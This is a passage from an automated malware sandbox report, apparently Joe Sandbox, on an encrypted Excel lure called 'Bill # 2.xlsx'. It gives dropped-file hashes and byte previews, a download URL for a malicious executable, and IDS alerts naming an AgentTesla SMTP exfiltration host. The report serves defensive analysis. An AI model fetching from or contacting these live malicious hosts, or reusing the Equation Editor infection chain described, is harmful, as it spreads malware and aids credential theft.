                                              VESSEL CONTACT DETAILS.docGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              MB SHIPPING PDA TEMPLATE.xlsmGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              VESSEL DETAILS.docGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              SHIP#UfffdS PARTICULAR.xlsmGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              BUNGE OPS.docGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              #4725162.docGet hashmaliciousBrowse
                                              • 23.21.42.25
                                              Quote Request October-2020.xlsGet hashmaliciousBrowse
                                              • 23.21.42.25

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                              Category:dropped
                                              Size (bytes):58936
                                              Entropy (8bit):7.994797855729196
                                              Encrypted:true
                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):326
                                              Entropy (8bit):3.123186963792904
                                              Encrypted:false
                                              SSDEEP:6:kK5CJwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:EmkPlE99SNxAhUegeT2
                                              MD5:AB6DA8AE6AA88FCEAE65300C795001E1
                                              SHA1:1CE227376FC49D31FB9F66A9C2FD0CF6121495F4
                                              SHA-256:DC99379FCEAA00E3BC2BF531C24C7A88ABDF449FDED25CA6423B1BEAD9658A91
                                              SHA-512:48E6343AEAC724E7182D4E869BCA918E33B6E00127146C33206FAFB91C6F80592F76287FA3FA99C456E58C6DC920ADE623449643E049F8C14B9985D5BCC1A27B
                                              Malicious:false
                                              Reputation:low
                                              Preview: p...... ..........g...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):619008
                                              Entropy (8bit):7.862193874993034
                                              Encrypted:false
                                              SSDEEP:12288:U/bH8hDt8CFefzXYQ1pY5ucIaIGnrqhz2VLgBpVy:2ritb6jYQXLGnrqIVkBpV
                                              MD5:C11D6124EE0522C7AB71D20CF3474DC0
                                              SHA1:C52A64B7189C762B907A9D727950F3D1364C68BA
                                              SHA-256:871A7F14C61157DBEA48D27F92BC64097E10EB44A9C8EF7543C435E275CA249C
                                              SHA-512:24B4D1776B4EC8610D1FE66A5AA9DC5A2886562E4805E0069E2177A477B272887CB7CD4616F4763814E6FFB6AA456A2B94301289B1FA75BF0585812D1F2A7C40
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              IE Cache URL:http://198.23.212.152/doc/tochi.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q._.................j.............. ........@.. ....................................@.................................|...O.......B............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...B............l..............@..@.reloc...............p..............@..B........................H.......x................q...w..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r)..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BF0B00E.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                              Category:dropped
                                              Size (bytes):48770
                                              Entropy (8bit):7.801842363879827
                                              Encrypted:false
                                              SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                              MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                              SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                              SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                              SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6B13A00.emf
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):1099960
                                              Entropy (8bit):2.015302275809141
                                              Encrypted:false
                                              SSDEEP:3072:7Xtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:hahIFdyiaT2qtXw
                                              MD5:EADDF03549BDB2AE98C0705F0D40A075
                                              SHA1:151E9F9681CEFFFFCDD6EBC06794FAA20A17D454
                                              SHA-256:B8B4B2780C4A577E6B123F1685E703804C2B8EE0891E3BAEBC5BEE8F23CA9862
                                              SHA-512:467B2C582E951EEC2A3E9F7064EC76BC97A6E6BF22103A71457309759315C8B9E554F42C86D6D654C5CE6B8B46B814C5AF2F06E246D11057C91B17D298F85632
                                              Malicious:false
                                              Reputation:low
                                              Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i...............................................................$........N.X$....................N.X$....... ....y.R....$... ............z.R............o...............................X...%...7...................{ .@................C.a.l.i.b.r.................X.......P....2.R.................{.R............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... ...6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE1BF201.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                                              Category:dropped
                                              Size (bytes):48770
                                              Entropy (8bit):7.801842363879827
                                              Encrypted:false
                                              SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                                              MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                                              SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                                              SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                                              SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                                              C:\Users\user\AppData\Local\Temp\Cab4338.tmp
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                              Category:dropped
                                              Size (bytes):58936
                                              Entropy (8bit):7.994797855729196
                                              Encrypted:true
                                              SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                              MD5:E4F1E21910443409E81E5B55DC8DE774
                                              SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                              SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                              SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                              C:\Users\user\AppData\Local\Temp\Tar4339.tmp
                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):152533
                                              Entropy (8bit):6.31602258454967
                                              Encrypted:false
                                              SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                              MD5:D0682A3C344DFC62FB18D5A539F81F61
                                              SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                              SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                              SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                              Malicious:false
                                              Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                              C:\Users\user\Desktop\~$Bill # 2.xlsx
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):330
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                              MD5:96114D75E30EBD26B572C1FC83D1D02E
                                              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                              Malicious:true
                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              C:\Users\Public\vbc.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):619008
                                              Entropy (8bit):7.862193874993034
                                              Encrypted:false
                                              SSDEEP:12288:U/bH8hDt8CFefzXYQ1pY5ucIaIGnrqhz2VLgBpVy:2ritb6jYQXLGnrqIVkBpV
                                              MD5:C11D6124EE0522C7AB71D20CF3474DC0
                                              SHA1:C52A64B7189C762B907A9D727950F3D1364C68BA
                                              SHA-256:871A7F14C61157DBEA48D27F92BC64097E10EB44A9C8EF7543C435E275CA249C
                                              SHA-512:24B4D1776B4EC8610D1FE66A5AA9DC5A2886562E4805E0069E2177A477B272887CB7CD4616F4763814E6FFB6AA456A2B94301289B1FA75BF0585812D1F2A7C40
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q._.................j.............. ........@.. ....................................@.................................|...O.......B............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...B............l..............@..@.reloc...............p..............@..B........................H.......x................q...w..........................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....*B...(.....o....&*2.(....t....*.(....&*2.t....o....*F~....~....(.....*..*..(....*.(.........(....(.........(....(....o.........*&...o....*.(....*.(....*.r)..p.....*6..{b...(^...*..o.....{a...{c....{b...oZ...(^...*.so....p...*..oq...*V.{....od....(...+...*J.{....o1....ov...*J

                                              Static File Info

                                              General

                                              File type:CDFV2 Encrypted
                                              Entropy (8bit):7.961431743638658
                                              TrID:
                                              • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                              File name:Bill # 2.xlsx
                                              File size:201728
                                              MD5:483b35b49726fc59ba720ca3106a69f6
                                              SHA1:58b66c28ec98e732920179eb4e270e7b00517f08
                                              SHA256:982e68644911b369c8d440f2ca7e0380b5bb7b3400fe2f53d13f34f2fce5505b
                                              SHA512:9e93e0215b8cda65b0c659ef4791217cee803efd01883fc2cf8972650ad9d57e93bfa50b3fd4c66789bdd36046583edf4df180cec215183af373559ec87aeb36
                                              SSDEEP:3072:g8Za/8OonOp+yffMXsTflheKSxtJfqp/8ffgN9RFFPn2SByL/OpaN/Ne67wGv:JINoOp+y3OsTyK64SYNzXP/E/mINZT
                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4e2aa8aa4b4bcb4

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "Bill # 2.xlsx"

                                              Indicators

                                              Has Summary Info:False
                                              Application Name:unknown
                                              Encrypted Document:True
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:False
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:False

                                              Streams

                                              Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                              General
                                              Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                              File Type:data
                                              Stream Size:64
                                              Entropy:2.73637206947
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                              Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                              Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                              General
                                              Stream Path:\x6DataSpaces/DataSpaceMap
                                              File Type:data
                                              Stream Size:112
                                              Entropy:2.7597816111
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                              Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                              Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                              General
                                              Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                              File Type:data
                                              Stream Size:200
                                              Entropy:3.13335930328
                                              Base64 Encoded:False
                                              Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                              Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                              General
                                              Stream Path:\x6DataSpaces/Version
                                              File Type:data
                                              Stream Size:76
                                              Entropy:2.79079600998
                                              Base64 Encoded:False
                                              Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                              Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                              Stream Path: EncryptedPackage, File Type: data, Stream Size: 194648
                                              General
                                              Stream Path:EncryptedPackage
                                              File Type:data
                                              Stream Size:194648
                                              Entropy:7.99819553665
                                              Base64 Encoded:True
                                              Data ASCII:P . . . . . . . < . . . H N . : . p . # . . $ A . . . . . . D , . . L . . < L . . H . . . . 3 . l < \\ 5 ! z L Y . R 5 . y . A R . . . . . 3 . Z . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m . . . " . . . . . . . . . . . m
                                              Data Raw:50 f8 02 00 00 00 00 00 3c 80 b7 8d 48 4e 1f 3a b6 70 da 23 fe 8a 24 41 f7 9b b2 80 cc be 44 2c 0e b4 4c ed b3 3c 4c ba f5 48 f8 a4 c8 1c 33 86 6c 3c 5c 35 21 7a 4c 59 f7 52 35 c3 79 e6 41 52 ba d1 f2 b2 d1 33 f1 5a 89 06 d6 f2 99 ec 92 6d 17 83 03 22 c2 a6 7f 06 89 06 d6 f2 99 ec 92 6d 17 83 03 22 c2 a6 7f 06 89 06 d6 f2 99 ec 92 6d 17 83 03 22 c2 a6 7f 06 89 06 d6 f2 99 ec 92 6d
                                              Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                              General
                                              Stream Path:EncryptionInfo
                                              File Type:data
                                              Stream Size:224
                                              Entropy:4.53373944191
                                              Base64 Encoded:False
                                              Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . 7 . . h . $ / . . . . k . . q k . . . . ~ a . R " l . . G . . . . . . . . . N t @ . . . . . . k . . . T . . . . y . . . = . . . . . . .
                                              Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              11/20/20-13:47:40.685847TCP1560WEB-MISC /doc/ access4916780192.168.2.22198.23.212.152
                                              11/20/20-13:47:40.685847TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916780192.168.2.22198.23.212.152
                                              11/20/20-13:49:22.192581TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49170587192.168.2.22208.91.198.143

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 20, 2020 13:47:37.549098015 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.553167105 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.684802055 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.685024977 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.685847044 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.805413961 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.805485964 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.805515051 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.805526972 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.805552006 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.805566072 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.805569887 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.805610895 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923609972 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923664093 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923722029 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923767090 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923787117 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923810959 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923837900 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923845053 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923850060 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923852921 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923892975 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923897028 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923930883 CET8049167198.23.212.152192.168.2.22
                                              Nov 20, 2020 13:47:40.923938036 CET4916780192.168.2.22198.23.212.152
                                              Nov 20, 2020 13:47:40.923974037 CET4916780192.168.2.22198.23.212.152
